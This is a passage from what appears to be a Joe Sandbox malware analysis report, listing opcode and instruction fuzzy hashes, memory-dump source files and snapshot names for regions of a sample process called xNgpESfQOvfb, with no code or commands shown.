                        • Opcode Fuzzy Hash: a201ea6f298a97309e75a624a4248c8f7df1d7a5d90b4339708ca009f969d4d8
                        • Instruction Fuzzy Hash: FCD0C7B5D0510DFF8741EFA4D90449D7BF9EB49201B1045E5D506D7210EF315A145B91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65dd49cf1f96a779b457607de5b90c3b99726f7b5d34a21053ce4c74a4ee4d1a
                        • Instruction ID: 67374c3f79a12f899f83dba28544b0307358660e4608b7dfea9504ddacbb7ab6
                        • Opcode Fuzzy Hash: 65dd49cf1f96a779b457607de5b90c3b99726f7b5d34a21053ce4c74a4ee4d1a
                        • Instruction Fuzzy Hash: 10D0123A00D281AFD753AB50E900CA67FB4FFC2310305C0A7E5809A032E125452CD732
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ebf1b84ce92279a1ed1369b12b82b348765b32e81b756d3f4acd133b6575260
                        • Instruction ID: 1d0d151d89e1f11f0efbe8a7b80c389d42c7fee4f3fe3de414e7f5bd08a2391c
                        • Opcode Fuzzy Hash: 4ebf1b84ce92279a1ed1369b12b82b348765b32e81b756d3f4acd133b6575260
                        • Instruction Fuzzy Hash: F7C01261B091801FCB49C65CA950455BBA15BC9100719C0FE980DCB2D6F9559C0B8311
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e12418f4ecbf3435466d3e7ccd123ad8f4edb529be0e60584250a28e02561241
                        • Instruction ID: 71d0b525e268f4251a187971f44c52751f2abc59e33b0cae9466c80d8fd95a27
                        • Opcode Fuzzy Hash: e12418f4ecbf3435466d3e7ccd123ad8f4edb529be0e60584250a28e02561241
                        • Instruction Fuzzy Hash: 90C08C7000074887EB647BA4B90E7283678774228FF448225D10D40062CBA844A4C662
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ce1ad8807e7496814180043ce4b70c71c15cd55205c3f63baac23210b5b9710
                        • Instruction ID: 6c67658ed060eae69598a9efa828ea8e785213f9639fa2a5066e0df802641aa1
                        • Opcode Fuzzy Hash: 4ce1ad8807e7496814180043ce4b70c71c15cd55205c3f63baac23210b5b9710
                        • Instruction Fuzzy Hash: F6C04C75155001DB96C1BF549684896BAD5FF95300B40DC56A54566021DA21C5289712
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84ef8226f9ab794a719293ec5d2d9bd8eb1b6647183d5a89e71000882aeeae34
                        • Instruction ID: 9ac2b3e4beca9ea94f60c0de28b8717b59962f8a8df53f981248d955c65636cd
                        • Opcode Fuzzy Hash: 84ef8226f9ab794a719293ec5d2d9bd8eb1b6647183d5a89e71000882aeeae34
                        • Instruction Fuzzy Hash: 3EC002B4D1D248CFDB61ABA1E4544FC7B75BA0B201F20485A9537B7252C7212844CF11
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96daa19bc85f88240f12fe0c9efa929fd69b4e9e29ea099f4c60085b0c993eb1
                        • Instruction ID: cb2e6bed722cf4ddfcba8a79a75aaf42a4c522bd62c6c5c005e0e1cbaee8d5d4
                        • Opcode Fuzzy Hash: 96daa19bc85f88240f12fe0c9efa929fd69b4e9e29ea099f4c60085b0c993eb1
                        • Instruction Fuzzy Hash: C8B092B9264101E654807AA49990AAAA841BBA2B00B409C1A3349300448A605466912B
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b07fd5545c91071621c00c610f97731d3504a7ccba33713ad7c14820ea101133
                        • Instruction ID: 60e3522d76e542e594b56ecfd534f130490de2bac494518cabc94056afcec639
                        • Opcode Fuzzy Hash: b07fd5545c91071621c00c610f97731d3504a7ccba33713ad7c14820ea101133
                        • Instruction Fuzzy Hash: 1DC0480A04E7C20ECB2303302A20342BFB2988340438E04CBC8C28A5A3C109486DC711
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b035704758fbd32e79f8ce99107a436d76053379964936f6ab4b4f15795cf138
                        • Instruction ID: 7fa61e335cb033e815388c3170b67bc9d071437780c2d09f9dd90f68926e7349
                        • Opcode Fuzzy Hash: b035704758fbd32e79f8ce99107a436d76053379964936f6ab4b4f15795cf138
                        • Instruction Fuzzy Hash: 45C048B4D18208CFCB60ABA1E4488FDBB7ABB0E601F2048299437B3202C7202840CF40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ff88198d4c3d0ce100483a2fdcdf81a28cc8ad81da6fecf5d44c13ca45d4ab2
                        • Instruction ID: e31b377cf189cdadbd3c64c77ed7903cd8103fbe99f786d6d950e3b3dc085090
                        • Opcode Fuzzy Hash: 4ff88198d4c3d0ce100483a2fdcdf81a28cc8ad81da6fecf5d44c13ca45d4ab2
                        • Instruction Fuzzy Hash: 8DF17134B002059FDB18EB7AE858B6E7BB7FFC8300F548568E5069B3A5DE749C418B81
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0502f15ad99c85070cb61deab97f303758c26bbf2db29ad4f1f9bd557a1cd8c
                        • Instruction ID: 1c8beef463b63d3f110d484b6283acfee286ebae484bd14ff4b6bc853426897b
                        • Opcode Fuzzy Hash: b0502f15ad99c85070cb61deab97f303758c26bbf2db29ad4f1f9bd557a1cd8c
                        • Instruction Fuzzy Hash: 1EE1AF34B002458FDB19EB7AE8A866D3FB2EFC9300F148569D506DB3A5DE789C45CB81
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3611095259392ce69ce915d8f4e4e16d25ad5bf2568e5066b761e6a9abc5eba4
                        • Instruction ID: 53f9c8070f5cf3e5834457ce39da5b80079df6e8a9586c665fb853075893e5d8
                        • Opcode Fuzzy Hash: 3611095259392ce69ce915d8f4e4e16d25ad5bf2568e5066b761e6a9abc5eba4
                        • Instruction Fuzzy Hash: 1B91AF34B002058FEB18EB7AD86876E7AE7FFC8310F548529D90A9B395DF759C418B81
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 461a61d1a0f425a070ae7fcf7eb75ece2b7b0271a66a689fbde4f64c167ecdf8
                        • Instruction ID: fe291bd94983f61d1093a656fac3faafbe074a391ba80cabff6fc64df07bd221
                        • Opcode Fuzzy Hash: 461a61d1a0f425a070ae7fcf7eb75ece2b7b0271a66a689fbde4f64c167ecdf8
                        • Instruction Fuzzy Hash: 7041DE35B00209DFDB08EBF9C8546AEBFBAEFC9310B144069D50ADB346DE749C428B51
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61c1789e91d549011bd57ca45291b844b4a9b9011f1001dfe7116862a71d0ad0
                        • Instruction ID: d6f5bf55a46dae4838afd17a1944bb32fa3ba40b07a01b5bf800b65824d19ddd
                        • Opcode Fuzzy Hash: 61c1789e91d549011bd57ca45291b844b4a9b9011f1001dfe7116862a71d0ad0
                        • Instruction Fuzzy Hash: 9521F330B022968FCB48EB79895467F7BF6EFC9200B5484A9E509DB395EE74CC06C791
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d978d0289be4b4c66cf2939150e7deed4caece1f409c7952701415c8e59881da
                        • Instruction ID: c7757fd48a24b2710e5fab64de3ffc9c1e9e729d1ceacc02e45ef7a06e9df9b7
                        • Opcode Fuzzy Hash: d978d0289be4b4c66cf2939150e7deed4caece1f409c7952701415c8e59881da
                        • Instruction Fuzzy Hash: 65213530B022968FCB48DB7D8850A7F7BF6EFC9204B5480A9E409EB386DE309C059791
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f8f133bfe23af5c662599e3b7fc1e6402f6449d8ec730a9f08b078969a62ca3
                        • Instruction ID: 06586e14742d85c743bb98e30feae4ee97b911c4d65a17925567582d91ffb536
                        • Opcode Fuzzy Hash: 0f8f133bfe23af5c662599e3b7fc1e6402f6449d8ec730a9f08b078969a62ca3
                        • Instruction Fuzzy Hash: 0D318D34A0020ADFDB05EBBAD8506ADBFB6FF89300B1045A9D515AB341DBB46E84CF51
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6760a367208e3d55f0861c3c8b200b044fa60ffbe1817f7bcd2a3a3056f0077f
                        • Instruction ID: 30ffeafaf90b059fee301ba72deef50411ba9f9cf5e39516599bcb96cd8aa288
                        • Opcode Fuzzy Hash: 6760a367208e3d55f0861c3c8b200b044fa60ffbe1817f7bcd2a3a3056f0077f
                        • Instruction Fuzzy Hash: E321BE30A04208CFDB48EFB8D8946AE7BF1EF89300F5485A9D505DB295EB30AD14CB81
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdebca1a32dfcaf0762c38b56b7e6da2f8d5400b40397a5a690a83ea8fb14e25
                        • Instruction ID: 76c4a26de57277d1858bd5cf5ff1b37d5dd1ee19e5f9535634a27045cd56f41d
                        • Opcode Fuzzy Hash: fdebca1a32dfcaf0762c38b56b7e6da2f8d5400b40397a5a690a83ea8fb14e25
                        • Instruction Fuzzy Hash: AD213D74A0020ADFDB04EBFAD9546ADBBB6FF88300F104569D515AB341DB746E80CF51
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e6a65f855d8a298fee1324ea2b78f0068b82865871cecd1b8e1b36226a7a850
                        • Instruction ID: 350903c29a031bc4d1260122734c9fc2eacf207a851b09920664997167e1eaaa
                        • Opcode Fuzzy Hash: 5e6a65f855d8a298fee1324ea2b78f0068b82865871cecd1b8e1b36226a7a850
                        • Instruction Fuzzy Hash: 4D21AC3810024ACFDB09DFABFA909553F79FB89304704669CD5149F216DABC6D8ADF81
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 273268ce638b59e4c6ac69090026cd3a081395077b32e57127c61de5c22637e6
                        • Instruction ID: 1eddf0d2bca4243ffed189ae45391ef71c58c3a36a0d545af01ec12de4ee7ae3
                        • Opcode Fuzzy Hash: 273268ce638b59e4c6ac69090026cd3a081395077b32e57127c61de5c22637e6
                        • Instruction Fuzzy Hash: F521BE3810024FCFDB19DFABFA909553BB9FB88304700A69C95149F315DABC6D8A8F81